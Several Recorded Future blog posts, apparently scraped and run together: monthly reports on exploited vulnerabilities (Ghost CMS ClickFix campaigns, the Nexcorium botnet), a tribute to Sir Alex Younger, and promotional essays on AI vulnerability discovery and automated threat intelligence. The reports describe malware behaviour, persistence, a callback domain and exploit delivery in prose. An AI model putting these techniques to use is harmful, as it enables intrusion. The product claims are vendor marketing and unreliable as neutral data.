These vulnerabilities affected products from 20 vendors. 21 of the 41 vulnerabilities were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, 19 were surfaced through honeypot data, and one was reported by a cybersecurity vendor.

The 41 vulnerabilities in this report affected products from 20 vendors. Vercel accounted for approximately 27% of the vulnerabilities, driven by honeypot-sourced Next.js activity. The remaining exposure was concentrated across a range of enterprise software, security, networking, developer tooling, and cloud-related products.

Quick Reference: May 2026 Vulnerability Table

All 22 vulnerabilities below were actively exploited in May 2026. This table does not include the 19 CVEs associated with honeypot activity, which are available to Recorded Future customers via the CVE Monthly Report. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.

Table 1: List of vulnerabilities that were actively exploited in May, 2026 based on Recorded Future data (excluding honeypot-sourced CVEs).

Key Trends: May 2026

• In May 2026, threat actors exploited a Ghost CMS vulnerability in large-scale ClickFix and FakeCaptcha poisoning campaigns.
  • The campaigns used compromised Ghost CMS websites to inject malicious JavaScript, redirect victims through social engineering lures, and stage dropper and loader payloads from attacker-controlled infrastructure.
• 12 of the 41 vulnerabilities enabled remote code execution (RCE), affecting products from 8 vendors: Microsoft, Adobe, Langflow, Palo Alto Networks, Apache, openDCIM, Fortinet, and Ivanti.
• Insikt Group identified public proof-of-concept (PoC) exploits for 32 of the 41 vulnerabilities in this report.
• The most commonly observed flaws this month were CWE-79 (Cross-site Scripting), CWE-506 (Embedded Malicious Code), and CWE-89 (SQL Injection), with three CVEs each.
• 5 of the 41 vulnerabilities in this month’s prominent vulnerabilities table were first disclosed between 2008 and 2010, making them at least 15 years old, with the oldest vulnerability being approximately 18 years old.
  • This reinforces our finding that attackers continue to exploit long-known weaknesses in environments where patching has lagged.
  • Additionally, the fastest observed time from a vulnerability’s public disclosure to exploitation was less than one day.

Exploitation Analysis

This section highlights some of the highest-impact, actively exploited vulnerabilities this month, specifically those linked to known threat actor campaigns or that have public PoC exploits available. Vulnerabilities with no meaningful public technical detail are summarized in the disclosures table only.

Threat Actors Exploit CVE-2026-26980 in Ghost CMS To Conduct Large-Scale ClickFix Poisoning Campaigns, Sample Available From Recorded Future Malware Intelligence

On May 21, 2026, cybersecurity firm XLab published a technical analysis detailing large-scale ClickFix poisoning campaigns targeting vulnerable Ghost Content Management System (CMS) instances by exploiting CVE-2026-26980. Ghost CMS allows users to create, manage, and publish content for blogs, media sites, newsletters, and subscription-based websites through a node.js-based publishing platform.

CVE-2026-26980 is a critical SQL injection vulnerability in Ghost CMS that allows unauthenticated threat actors to extract Ghost Admin API Keys and modify website content through the Ghost Admin API.

As previously reported by Insikt Group®, at least two threat groups exploited CVE-2026-26980 to inject malicious JavaScript into more than 700 compromised Ghost CMS websites across industries, including blockchain, artificial intelligence (AI), and financial technology (fintech). According to XLab, the threat actors used the compromised websites to deliver ClickFix and FakeCaptcha social engineering attacks that tricked victims into executing malicious commands and malware payloads on their systems.

Insikt Group® obtained one of the malicious samples, UtilifySetup.exe, from Recorded Future Malware Intelligence. The sample matched the sandbox YARA rule for detecting Inno Setup packaging. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:

• Conducts DLL injection
• Retrieves the system language and geolocation using the Windows registry
• Drops files named UtilifySetup.tmp (SHA256: 7790fd1035266000ed6d6cc35822f7683f5271663af8a5b5effadff85316df6d) and Grape.exe
• Enumerates files and directories
• Retrieves system information
• Delays execution using the Sleep API function for evasion
• Detects debuggers using the GetTickCount API function to compare the timing and the IsDebuggerPresent API function
• Creates a file inside the C:\Users\user\AppData\Local\SuperMaxionQuickMaxlite directory, corroborating XLab’s analysis
• Terminates running processes

Sandbox analysis categorized UtilifySetup.tmp as malicious due to the sample exhibiting discovery capabilities. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:

• Conducts DLL injection
• Retrieves the system language and geolocation using the Windows registry
• Executes UtilifySetup.exe installer from the %Temp% directory using internal Inno Setup /SL5 launch parameters
• Executes a file named Grape.exe inside the C:\Users\user\AppData\Local\SuperMaxionQuickMaxlite directory

Once executed, Grape.exe performs the following actions on a victim’s machine:

• Adds a Windows registry Run key entry named electron.app.Grape set to execute itself when the victim logs in
• Enumerates running processes
• Sends DNS request to web-telegram[.]ug

Further technical details associated with this activity, including sample analysis, MITRE ATT&CK techniques, and IoCs, are available to Recorded Future customers via Insikt Group® reporting.

Recorded Future customers can also access Malware Intelligence queries that surface samples communicating with campaign-associated URLs, domains, and IP addresses.

Figure 1: Risk Rules History from Vulnerability Intelligence Card® for CVE-2026-26980 in Recorded Future (Source: Recorded Future)

I was lucky to meet Sir Alex just as he was leaving MI6 in 2020. I traveled to London, having to navigate a few Covid restrictions. I asked him if this would cause problems. He smiled: “It is always better to ask for forgiveness than seek permission,” he said. Immediately I knew that this was someone I would get along with very well.

The objective was straightforward: I was hoping to recruit him to the Recorded Future board of directors, which we eventually accomplished after significant complications got in the way, once again solved by the previous method.

Sir Alex joined a Recorded Future board meeting in New York. As I welcomed him, Alex — smiling characteristically — introduced himself as having run the world’s best intelligence agency, a pointed reminder that superb people, tradecraft, and pedigree can rival any scale. And we wanted to learn from the best.

My assumption, as much as one should not make them, was that Alex could teach us everything in intelligence, except for perhaps around the technical SIGINT-like apparatus that is at the core of Recorded Future. Yet, in our first discussion, talking about “connecting dots,” Alex said, “it is not about connecting dots, it is about connecting entire collections,” which became the very underpinning of how we build our Intelligence Graph®. I was humbled, having underestimated him, and it taught me a valuable lesson.

Yet, the confidence of having run the world’s best intelligence agency did not at all hold back Alex from asking even the most basic questions. Coming from public service, driving revenue was not a familiar concept. As opposed to most senior characters who would do anything to not seem to have all the answers, Alex, early in the first meeting, when hearing the terms ARR and revenue, raised his hand and said, “please explain annualized revenue.” That is the sign of somebody who always wanted to learn and would not let pride get in the way of gaining insights.

Sir Alex brought great moral clarity, yet not the kind that is based on anger, “you’re either with us or against us,” rather, the kind that leads to an alliance of peers sharing in values that can defeat any autocratic counterpart. Teamwork, he would say, is the unique strength of the West, as we can build on trust, whereas our adversaries fundamentally cannot.

Speaking at the Recorded Future 2023 Predict conference, our audience spellbound, Sir Alex paraphrased Milton Friedman: “No individual can make a pencil alone.” He was cheered by everyone, and we know that this was the answer to beat our adversaries.

Over the last few months, I asked Alex for some favors, and I now find myself wondering whether I asked too much of him. He gave a briefing to thousands of Recorded Future clients on Iran with an energy and intellect that would put anyone to shame. And more recently, I asked him for help with a personal endeavour, which in hindsight was too much to ask at the time, yet he did something amazing.

I can only hope that I can be such a friend to my friends as Alex was to me.

Six months ago, when Alex was in the midst of treatment, I asked him if I could take him for a special dinner. We enjoyed amazing food and, truth be told, even more amazing wine. I came early to the restaurant and suggested to them, “he may eat and drink a little, please do not make a fuss about that.” Yet, Alex went at the food and wine with a vengeance, claiming that his treatment left him very hungry. If there ever was a fighting spirit, it was his.

Please join my Recorded Future colleagues in our cheers for Sir Alex Younger and thoughts for Sarah and their family.

I’m certain that he would want us to take the fight to the bad guys and build even greater alliances with our friends.

Last year, roughly 50,000 software vulnerabilities were disclosed. Recorded Future tracked 446 that were actually weaponized by threat actors. That's less than 1%. The problem was never finding vulnerabilities. It was always knowing which ones adversaries will actually use.

AI makes that distinction harder. Discovery accelerates for everyone, the noise grows faster than any team can manually triage, and the window between a disclosed vulnerability and a working exploit keeps shrinking. Security leaders who've built intelligence-led programs are ready for what's coming. For them, Mythos isn't a crisis. It's the moment their program finally gets the attention it deserves, including in the boardroom.

The threat got faster. The fundamentals didn't.

The instinct to treat AI-assisted vulnerability discovery as a wholesale transformation of the threat landscape isn't quite right, and that imprecision will hurt you in a board conversation.

What's changed is speed. AI has compressed the time between a disclosed vulnerability and a working exploit from days to minutes. Your team has to match that tempo.

What hasn't changed is the fundamental prioritization problem. Disclosed vulnerabilities have more than doubled over the last five years, from roughly 21,000 in 2021 to approximately 50,000 in 2025. That growth happened before AI-assisted discovery became widely accessible. AI makes that challenge faster and more consequential. It doesn't make it new.

That distinction matters because it changes the conversation from "we need to completely rebuild our security program" to "we need to make sure our intelligence capability is operating at the speed the threat environment now demands." The first conversation is expensive and destabilizing. The second is actionable.

Most programs have a triage problem, not a discovery problem

When an AI model returns hundreds of new vulnerability findings, the bottleneck shifts immediately to prioritization. In most organizations, that process is still largely manual. Analysts research each finding, assess severity, cross-reference existing guidance, and attempt to sequence a response. At the volume and velocity these models produce, that workflow can’t keep pace.

The result is a backlog where genuinely critical exposures sit alongside noise, and triage decisions get made without the context needed to get them right. That's not a tooling problem. It's an intelligence problem.

The organizations handling this well have built a layer between discovery and action that automatically correlates every finding against real-world adversary activity, flags vulnerabilities tied to active campaigns, and tells the analyst what it means and what to do about it, not just what was found. Raw discovery tells you that you have a problem. Intelligence-led response tells you which one to solve first, then hunts it down autonomously at machine speed.

There's a second exposure worth naming, and it can produce an uncomfortable board conversation. Most enterprise security investment is concentrated on what enters the environment and what executes at the endpoint. AI-assisted discovery surfaces a different category of risk: exposures that already exist inside the environment, in software running on your infrastructure today, in third-party components that weren't fully inventoried, in vendor systems connected to yours in ways that aren't fully mapped.

Organizations that have concentrated their posture at the edge may find that some of their most consequential vulnerabilities sit somewhere else. That's a hard answer to give a board that just read about Mythos. It's better to surface it yourself than to have someone else surface it for you.

The programs that didn't panic had something in common

The CISOs I talk to who've been building intelligence-led programs for years have handled Mythos differently than organizations that haven't. They didn't need to rebuild anything from the ground up. They used the moment to sharpen programs they'd already been investing in.

But not every organization was already there when Mythos was announced, and that's the more important story for most security leaders reading this. The announcement was a forcing function. The organizations that treated it as one are already in a different position than the ones that didn't.

A financial services customer who came to us shortly after the Mythos announcement is a good example of what moving quickly actually produces. They rebuilt their vulnerability workflow around our automation capability and within two weeks their team had recovered over 20 hours a week that had previously gone to manual triage and research. Those aren't hours saved on busywork. They're hours now going toward work that actually reduces exposure. And when the next wave hits, they won't be caught flat-footed.

What made that possible wasn't just better tooling. It was an intelligence layer that automatically matches vulnerabilities to known threat actors, ties findings to active campaigns where relevant, and scores on real-world exploitation evidence rather than theoretical severity. Every finding arrives with the context an analyst needs to act, without hours of manual research standing between the signal and a response.

The practical outcome is coverage at scale without proportionally growing the team. That's what operating at machine speed means in practice, and it can hold up in a board conversation for a simple reason: it's not just a security answer, it's a business one.

What wins the board conversation

Boards are asking about AI-driven vulnerability discovery because it's broken into mainstream coverage in a way most threat developments haven't. That attention isn't going away. Security leaders who can walk into that conversation with a clear, specific answer about how they're managing the risk will come out with more credibility and more resource authority.

Mythos and Daybreak are the start of a longer trend. The right response isn't to treat each new model as a fresh crisis. It's to build the intelligence foundation that makes your program resilient regardless of what comes next. When you've done that, AI-assisted discovery stops being a source of anxiety and becomes what it should be: a faster path to finding and fixing what actually matters.

Ready to go deeper on the operational response? Recorded Future Chief Product Officer Jamie Zajac lays out the full playbook here.

• Discovery has been commoditized. Frontier AI models like Mythos and GPT 5.5 are making vulnerability discovery cheap, fast, and broadly accessible.
• The defender's job is to match the speed. Manual triage has lost the throughput race.
• Threat intelligence is the prioritization layer at machine speed. Recorded Future Intelligence observed only 446 actively exploited CVEs in 2025 against approximately 50,000 disclosed — less than 1%.
• Recorded Future's agentic processing plus Autonomous Threat Operations can be the answer. It offers detection signatures in just 31 minutes and automated action across more than 100 integrations, with third-party reach coming soon. Attackers are operating at this speed. Your defenses have to match them.

It’s now a question I get daily: “What is Recorded Future doing about Mythos?”

It's a fair question. Anthropic's Project Glasswing announcement, paired with the vulnerability research benchmarks coming out of OpenAI's GPT 5.5, has made AI-driven vulnerability discovery a board-level topic in a matter of weeks.

To answer that question, first we need to discuss the operational problem defenders actually face and why threat intelligence can be the best way to counter it at machine speed. Then we'll get into what Recorded Future is already deploying to solve it: our agentic processing.

The problem: drowning in signal, starving for context

Even before AI and the news of Mythos’ capabilities and speed, defenders were struggling. Signal volume was outpacing analyst capacity. Coverage gaps widened daily as long-tail vendors and niche platforms went unmonitored. Raw findings arrived without root cause, threat-actor relevance, or vetted remediation paths. Producing one analyst-grade enrichment took hours of senior researcher time. The math didn't work at enterprise scale.

The reality check: 50,000 disclosed, 446 actually exploited

The data point that should anchor any conversation about the AI vulnerability surge: The NVD disclosed approximately 50,000 CVEs in 2025. Recorded Future Intelligence observed only 446 actively exploited in the wild — less than 1%.

Finding vulnerabilities is one thing, but knowing which ones matter, to which environments, against which adversaries, and with which compensating controls already in place is a whole different matter. Forrester put it directly: “The limiting factor in security is no longer the ability and knowledge to find problems — it's the ability to absorb, prioritize, and act on them before adversaries do.” The bottleneck has always been on the absorb-prioritize-act side. The find side was never the problem.

Frontier AI models accelerate the finding side. Threat intelligence is what helps close the prioritization gap on the fixing side.

The prioritization filter: what turns 50,000 into 446

Threat intelligence is operational, not philosophical. It comes down to four signals that distinguish the small fraction of CVEs adversaries actually weaponize from the overwhelming majority that they don't. These four signals are non-negotiable to be able to get to the prioritizing at speed and scale:

1. A live risk score. A composite index of exploitation likelihood and impact, recalculated continuously as evidence shifts. Not a static CVSS rating; a live measure of which vulnerabilities are weaponizable, exploitable in modern environments, and likely to be picked up by threat actors.
2. Active exploitation in the wild. Observed exploitation evidence — not theoretical PoC availability, but documented use against real systems by real actors. Sources include open and dark web telemetry, vendor disclosures, government advisories (CISA KEV catalog and equivalents), and primary research like what Insikt Group® produces.
3. Ransomware actor association. Mapping CVEs to specific ransomware operators and access broker activity. The same vulnerability used by a financially motivated ransomware affiliate against your sector is a different incident than the same CVE in a state-actor toolkit targeting a different region.
4. Sector and campaign targeting. Which threat actors are targeting your industry, which TTPs they're using, which exposures map to known tooling.

Together, these four signals are how you prioritize what actually matters for any given defender.

Recorded Future's answer: agentic processing plus Autonomous Threat Operations

If attackers are moving at Mythos speed, your defenses need to keep up using agentic processing and Autonomous Threat Operations. This is my answer to the question we started with about what Recorded Future is doing about the new world we live in.

Agentic processing is the production system that turns exposure signals into deployable intelligence. The pipeline reads descriptions, vendor advisories, and patch diffs the moment they appear. It produces production-ready detection signatures — documented detection logic, evidence specification, passive fingerprinting strategy. It writes analyst-grade enrichment for every finding — root cause, exploit mechanics, threat-actor associations, prioritized defensive controls with deploy-time and false-positive estimates, validated remediation tasks with acceptance criteria and rollback plans.

It’s end-to-end target: identification to deployment in customer environments in only 31 minutes. Internal averages run lower. No security team operating manual triage workflows is matching that throughput.

That content can reach every relevant control point in your environment through Autonomous Threat Operations (ATO).

ATO turns agentic-processing outputs and correlated intelligence into operational action across over 100 integrations spanning SIEM, SOAR, EDR/XDR, NGFW, vulnerability management, threat intelligence platforms, identity and access management, email and cloud security, GRC, and threat-informed defense. It continuously deploys priority intelligence, runs autonomous threat hunts, pushes detection rules, and takes preventive action without analyst hours spent on manual correlation. The 8-to-12 hours of weekly correlation work most analyst teams perform manually is almost entirely eliminated. The hunting cadence becomes 24/7.

Soon, ATO will do this across your attack surface and third parties, as vendor exposure has been the most common path to breach for the past three years.

The five-stage pipeline that produces all of this — threat signals, intelligent enrichment, validation and verification, structured output, and customer workflow — runs continuously. Production-ready content is in customer environments within minutes of the originating disclosure across every category of threat the platform detects.

Why agentic processing is different, and why your organization needs it

Four things distinguish agentic processing from anything a security team can build manually:

1. Hours → minutes. A complete enriched finding can be produced in minutes, not the hours of manual research the same output used to require.
2. Order-of-magnitude efficiency. Based on Recorded Future R&D findings, per-vulnerability triage runs at 40x the efficiency of manual research effort, enabling coverage at scale your team cannot achieve by hand.
3. Long-tail coverage. Localized vendors, niche platforms, and legacy systems become economically viable to cover at breadth.
4. Always current. Continuous refresh cycles keep intelligence accurate as threats evolve.

These benefits represent the difference between preventing threats pre-attack and absorbing the damage after.

Let’s look at an example of what agentic processing does at machine speed.

React2Shell with agentic processing

Take CVE-2025-55182 — React2Shell, a pre-authentication remote code execution vulnerability in React Server Components. Within minutes of disclosure, agentic processing produced:

1. An Attack Surface Intelligence (ASI) detection signature with documented detection logic, evidence specification, and passive fingerprinting strategy
2. Root cause and exploit mechanics down to the specific code path
3. Active campaigns, threat-actor associations, observed exploitation evidence
4. Confidence-graded indicators of compromise with detection commands
5. Prioritized defensive controls with deploy-time and false-positive estimates
6. Manual validation procedures, remediation tasks with acceptance criteria and rollback plans, and post-remediation verification commands

In this new Mythos age, this type of agentic processing and speed is going to be required as the new baseline.

Beyond vulnerabilities: the same playbook generalizes

Vulnerability disclosure is the most visible trigger for the intelligence-at-speed pattern, but it isn't the only one. The same operational logic applies wherever a new threat signal surfaces and a defender needs to act on it before the adversary monetizes it.

When a brand impersonation site is stood up, the defensive sequence is the same: detection, intelligence enrichment (registrant, registrar, hosting infrastructure, historical campaign association), prioritized defensive controls (takedown coordination, blocking at email and web layers, alerting affected employees), and verification that the takedown landed. Recorded Future's Digital Risk Protection runs this loop continuously across the open, deep, and dark web.

When a stolen credential surfaces in an infostealer log market, Identity Intelligence runs the same pattern: detection of credentials tied to your environment, enrichment with infection context (malware family, device, other credentials in the same log, MFA cookie capture status), prioritized response (force password reset, revoke active sessions, alert the user), and verification.

The pattern is the posture. Apply intelligence at machine speed wherever the adversary is acting, across every category of threat surface. Vulnerabilities are one trigger. The work generalizes. Recorded Future is operationalizing intelligence at machine speed across our four solutions, Cyber Operations, Digital Risk Protection, Third-Party Risk, and Payment Fraud Intelligence.

What this means for defenders

The operational response to AI-driven vulnerability discovery is what separates organizations that contain exposures from those that wake up to incident response calls.

We are seeing customers set up automation to move faster in response to this new reality. A large enterprise in the financial services sector used Recorded Future to transform their vulnerability management workflow. Following a major patching effort across the organization, the team built out automation between their vulnerability scanning and IT service management tools. The result: a streamlined, repeatable process and an estimated weekly time savings of over 20 hours for the team.

We recommend taking these five actions so you can respond as well:

1. Move to autonomous intelligence-led security. Asset inventories are no longer sufficient without knowing if a vulnerability exists, if it is a priority, and what the blast radius is.
2. Compress your disclosure-to-detection cycle to minutes. Manual signature creation runs in days. Adversaries are moving in hours. Whatever your current cycle time, halving it is now baseline.
3. Demand intelligence-led prioritization, not severity scores. CVSS and EPSS describe the universe of vulnerabilities, not which ones are being weaponized against your sector this quarter. Threat intelligence helps you prioritize.
4. Action across the full stack, not just the endpoint. AI-driven discovery surfaces flaws in app code, kernels, libraries, and cloud configurations. Defensive response requires reaching wherever the attacker might use the bug.
5. Apply the same posture across all four threat surfaces. Cyber Operations, Digital Risk Protection, Third-Party Risk, and Payment Fraud all face the same AI-augmented attacker clock speed.

AI-driven vulnerability discovery is here. The big question is whether your systems can operate at attacker speed, with a depth of intelligence that survives executive scrutiny. If the answer isn’t a confident yes, then Mythos and the category behind it have already shifted the math against you.

See it in production. Request a demo to see Recorded Future Intelligence and Autonomous Threat Operations turn a vulnerability disclosure into deployable detection and action across your stack within minutes.

31 of the 37 were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, and six were surfaced only through honeypot data. Those six CVEs associated with honeypots are available only to Recorded Future customers.

Those 37 vulnerabilities affected products from 23 vendors. Microsoft accounted for approximately 22%, while the remaining exposure was concentrated across a range of enterprise-facing vendors, particularly security and systems management tools, collaboration and server platforms, developer and application-delivery software, remote support tools, and network-edge infrastructure.

In April, Insikt Group created Nuclei templates for the missing authentication vulnerabilities in Nginx UI (CVE-2026-33032) and Marimo (CVE-2026-39987). These Nuclei templates are available to Recorded Future customers.

Quick Reference: April 2026 Vulnerability Table

All 31 vulnerabilities below were actively exploited in April 2026. This table does not include the 6 CVEs associated with honeypot activity. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.

Table 1: List of vulnerabilities that were actively exploited in April based on Recorded Future data (excluding honeypot-sourced CVEs).

Key Trends: March 2026

• In April 2026, seven of the 37 vulnerabilities in this report were linked to ransomware activity.
  • Six are explicitly tied to Storm-1175's Medusa ransomware operations.
  • CISA has also linked CVE-2026-41940 with known ransomware use (Sorry Ransomware, per open source reporting).
  • Additionally, threat actors exploited CVE-2024-3721 in TBK DVR devices to deliver the Nexcorium botnet.
• Sixteen of the 37 vulnerabilities enabled remote code execution (RCE), affecting products from twelve vendors: Adobe, Apache, D-Link, Fortinet, Google, Ivanti, Kentico, Marimo, Microsoft, SimpleHelp, TrueConf, and Wazuh.
• Insikt Group® identified public proof-of-concept (PoC) exploits for 24 of the 37 vulnerabilities in this report.
• The most commonly observed flaws this month were CWE-22 (Path Traversal), followed by CWE-94 (Code Injection), CWE-20 (Improper Input Validation), and CWE-306 (Missing Authentication for Critical Function).
• Three of the 37 vulnerabilities are at least five years old, with the oldest approximately seventeen years old, reinforcing how attackers continue to exploit long-known weaknesses in environments where patching has lagged. Additionally, the fastest observed time from a vulnerability’s public disclosure to exploitation was two days.

Exploitation Analysis

This section highlights some of the highest-impact, actively exploited vulnerabilities this month, specifically those linked to known threat actor campaigns, that have public PoC exploits available, or for which Insikt Group® has created Nuclei templates to detect the vulnerability. Vulnerabilities with no meaningful public technical detail are summarized in the disclosures table only.

Threat Actors Exploit TBK DVR Vulnerability (CVE-2024-3721) to Deliver Nexcorium

On April 17, 2026, FortiGuard Labs (@FortiGuardLabs on X, formerly known as Twitter), associated with Fortinet (@Fortinet), published a technical analysis detailing a campaign that exploits TBK Digital Video Recorder (DVR) devices to deliver Nexcorium, a Mirai-based botnet. A TBK DVR device is a surveillance system recorder that captures, stores, and allows playback or remote viewing of video from connected security cameras. According to FortiGuard Labs, Nexcorium targets TBK DVR-4104 and DVR-4216 systems by exploiting CVE-2024-3721, an operating system (OS) command injection vulnerability that allows remote threat actors to execute arbitrary system commands.

Based on FortiGuard Labs’ analysis, the campaign begins with the exploitation of CVE-2024-3721 through crafted requests that manipulate the mdb and mdc arguments in TBK DVR devices, which delivers a downloader script named dvr. The exploit includes the HTTP header X-Hacked-By with the value Nexus Team - Exploited By Erratic. The dvr script retrieves Nexcorium binaries with filenames beginning with nexuscorp for architectures such as ARM, MIPS R3000, and x86-64. The dvr script then sets the Nexcorium binaries’ permissions to 777, and executes them with an argument that identifies the compromised system.

Further technical details associated with this activity, including sample analysis and IoCs, are available to Recorded Future customers via Insikt Group reporting.

Recorded Future customers can also access Malware Intelligence queries, which surface samples that connect to known network indicators.

Figure 1: Vulnerability Intelligence Card® for CVE-2024-3721 in Recorded Future (Source: Recorded Future)

For teams whose vulnerability management workflows depend on CVSS scores from NVD, this could create an operational gap. The CVEs in the unenriched backlog can signify real vulnerabilities affecting real software. They don't necessarily stop mattering because NIST didn't get to them.

Recorded Future does not believe that the solution is to source CVSS scores faster. Instead, Recorded Future endeavors to provide the signals that actually reflect attacker behavior. CVSS was designed to characterize the technical properties of a vulnerability — attack vector, complexity, required privileges, potential impact. CVSS was not designed with patch prioritization as a prime concern. This distinction has always existed; the growing gap in NVD enrichment increases the importance of the right intelligence and insights that can capture attacker behavior in real time.

Where vulnerability risk actually originates

Exploit code surfaces on GitHub. Proof-of-concept development gets discussed in offensive security forums and underground communities. Ransomware operators evaluate which vulnerabilities fit their deployment pipelines. Threat actors incorporate specific CVEs into their toolkits and begin scanning in search of exploitable targets.

At some point during or after that sequence, a CVE gets assigned and, under the previous policy, would eventually be enriched by NVD. By the time a practitioner sees a CVSS score in their scanner, the risk may already have materialized.

The delay between attacker use and the assignment of a CVE and CVSS score is not a new dynamic. For this reason, Recorded Future's vulnerability Risk Scores were never built to depend on NVD enrichment.

The intelligence that determines whether a vulnerability is dangerous originates in the technical communities, underground markets, exploit repositories, and malware ecosystems where attackers work. It does not come from institutional databases processing CVEs up to weeks or months post-assignment. NVD's policy change doesn't create a gap in Recorded Future's coverage because NVD is not the primary signal behind Recorded Future Vulnerability Intelligence.

What the model actually weighs

Recorded Future's risk scoring maps directly to the vulnerability weaponization lifecycle. Many of the signals fire based on where a CVE sits on that path, not on what NIST has or hasn't scored.

Figure 1: The vulnerability weaponization lifecycle, as displayed on Recorded Future’s Vulnerability Intelligence dashboard (Source: Recorded Future).

The signals that carry the most weight are those tied to active exploitation in the wild — malware samples observed by Recorded Future's collection infrastructure, ransomware operations validated by Insikt Group® analysts, and other direct evidence of attacker use. Confirmed exploitation activity carries the most weight in the model, regardless of a CVE's CVSS score. These are the signals that answer the question practitioners actually need answered: is someone using this right now?

Below active exploitation, the model tracks proof-of-concept availability, including the distinction between a verified and unverified PoC. Verified exploit code that demonstrates remote execution is a materially different signal from an unverified proof of concept of unknown reliability. As an example, exploit code on GitHub is not theoretical risk; it usually compresses the time between disclosure and weaponization. Recorded Future Risk Scores treat it accordingly.

In addition to these collection and analytic capabilities, Recorded Future tracks web reporting about a CVE before NVD has published enrichment data. For the majority of new CVEs going forward, this pre-NVD signal may be the earliest structured intelligence available anywhere. A CVE that NIST has marked Lowest Priority can still accumulate signals across many dimensions. As a result, the absence of a CVSS score in NVD doesn't create a blind spot in Recorded Future's assessment.

CVSS still matters. It just isn't the foundation.

CVSS scores flow into the model from multiple sources. Many CVE numbering authorities (CNAs) supply CVSS scores at the point of submission, and CVSS coverage across published CVEs remained above 90% in 2025 even as NVD's independent enrichment narrowed. That doesn't mean CNA-supplied scores are interchangeable with NVD's. Academic analyses of dual-scored CVEs have documented divergence rates above 50% throughout the past decade, reaching 70% in 2023, with disagreements sometimes large enough to move a vulnerability across severity tiers. For CVEs where neither NVD nor a CNA has provided scoring, Recorded Future independently assigns scores through its own analysis. CVSS occupies one position in the model, alongside signals grounded in observable attacker behavior, and those signals operate independently of whether a CVSS score exists at all.

What to do with this

Audit where your prioritization signals come from. If your program is relying entirely or primarily on CVSS scores pulled from NVD, you may have exposure, not just from the existing backlog, but from every new CVE entering the ecosystem under the new policy.

Recorded Future Vulnerability Intelligence, as a part of the Cyber Operations solution, scores every CVE against the full signal set — exploitation activity, malware and ransomware associations, proof-of-concept availability, threat actor targeting, and analyst-validated intelligence. All independent of NVD's enrichment pipeline. See this prioritization and automation in action with this click-through tour.

See how Vulnerability Intelligence integrates with your existing vulnerability management workflow — request a demo.

Artificial intelligence is often discussed as a tool for automating and accelerating existing cybersecurity workflows. While that framing is accurate, it is incomplete. The most consequential shift occurs when AI is combined with threat intelligence — both intelligence about attacker capabilities and TTPs, and intelligence about our own defensive weaknesses and exposure. This combination produces qualitatively new defensive capabilities that may, for the first time, begin to structurally narrow the long-standing asymmetry between attackers and defenders.

This memo examines what is genuinely new about AI-enabled defense, with particular emphasis on how the fusion of threat intelligence and AI reasoning changes the strategic calculus. It also argues that in the end, it is a question of who can most efficiently use scarce resources (compute and energy) to get the upper hand. Intelligence guides defenders in how to best use these resources to defend, thereby changing the balance of power against adversaries.

The Traditional Defender’s Dilemma

The core asymmetry in cybersecurity is well understood: defenders must protect every possible attack surface, while attackers only need to find one exploitable weakness. Defenders operate under constraints — budgets, compliance mandates, uptime requirements — while attackers can be patient, selective, and asymmetric.

Traditionally, threat intelligence has been consumed by defenders as a feed: indicators of compromise, malware signatures, and published advisories. This intelligence was valuable but largely reactive and disconnected from the defender’s own environment. Knowing that a threat group uses a particular technique is only useful if you can rapidly assess whether that technique works against your infrastructure. That assessment has historically required scarce human expertise, time, and tooling — precisely the resources defenders lack.

The Automation Layer: Real But Evolutionary

A significant portion of AI’s current impact on defense is best described as automation of existing processes: faster alert triage, automated enrichment, accelerated patch prioritisation, and AI-assisted Tier 1 SOC analysis. These improvements are valuable — they compress response times, reduce analyst fatigue, and address chronic staffing shortages — but they are conceptually extensions of workflows that already existed.

Similarly, AI can automate the ingestion and normalisation of threat intelligence feeds, reducing the manual work of parsing reports and extracting indicators. This is useful, but it does not change what defenders can fundamentally do with that intelligence. The real transformation lies elsewhere.

The Convergence: Where Threat Intelligence Meets AI Reasoning

The most significant shift is not AI applied to defense in isolation, nor threat intelligence consumed as a feed. It is the convergence of the two: AI systems that can reason simultaneously over what attackers are doing and what defenders are exposed to, in real time, at scale. This convergence produces capabilities that did not previously exist.

1. Connecting Attacker TTPs to Your Actual Exposure

Traditionally, a threat intelligence report might tell you that a particular adversary group is exploiting a vulnerability in a specific product, or is targeting your sector using a known technique chain. Acting on that information used to require an analyst to manually map those TTPs against your environment: do we run that product? Is the vulnerable version deployed? Are the relevant network paths open? Are our detection rules adequate for that technique?

AI can perform this mapping continuously and at scale. When a new threat report lands, an AI system can immediately cross-reference the described TTPs against a live model of your infrastructure, your patching state, your detection coverage, and your segmentation — and surface a prioritised assessment of actual risk, not theoretical risk. This transforms threat intelligence from awareness into actionable, environment-specific defense guidance.

2. Fusing Offensive Intelligence With Defensive Weakness Data

Defenders have long maintained two separate bodies of knowledge: external threat intelligence (what adversaries are capable of and likely to do) and internal vulnerability and exposure data (what weaknesses exist in our own environment). These have typically lived in different systems, managed by different teams, and reconciled manually and infrequently.

AI enables continuous fusion of these two streams. A model can hold both the attacker’s perspective — known TTPs, targeting patterns, tooling, and objectives — and the defender’s perspective — unpatched systems, misconfigured controls, overprivileged accounts, and detection gaps — and reason about the intersection. The result is not a vulnerability list or a threat report, but an integrated picture of where the attacker’s capabilities meet our specific weaknesses. This is the analysis that the best red teams produce during an engagement, except it can now run continuously rather than quarterly.

3. Predictive Prioritisation Based on Adversary Behaviour

Patch prioritisation has traditionally been driven by CVSS scores — a measure of theoretical severity that ignores both attacker intent and environmental context. AI models trained on threat intelligence can reorder priorities based on which vulnerabilities are actually being exploited in the wild, by which adversary groups, against which sectors, using which delivery mechanisms. Combined with internal exposure data, this enables prioritisation that better reflects real-world risk rather than abstract severity.

The same logic applies to detection engineering. Rather than building detections for every possible technique, AI can identify the techniques most likely to be used against your specific environment — based on who is targeting your sector, what tools they use, and where your coverage gaps are — and focus engineering effort where it matters most. In fact, in most cases AI will be able to build those detectors for you!

4. Reasoning Over Context at Scale

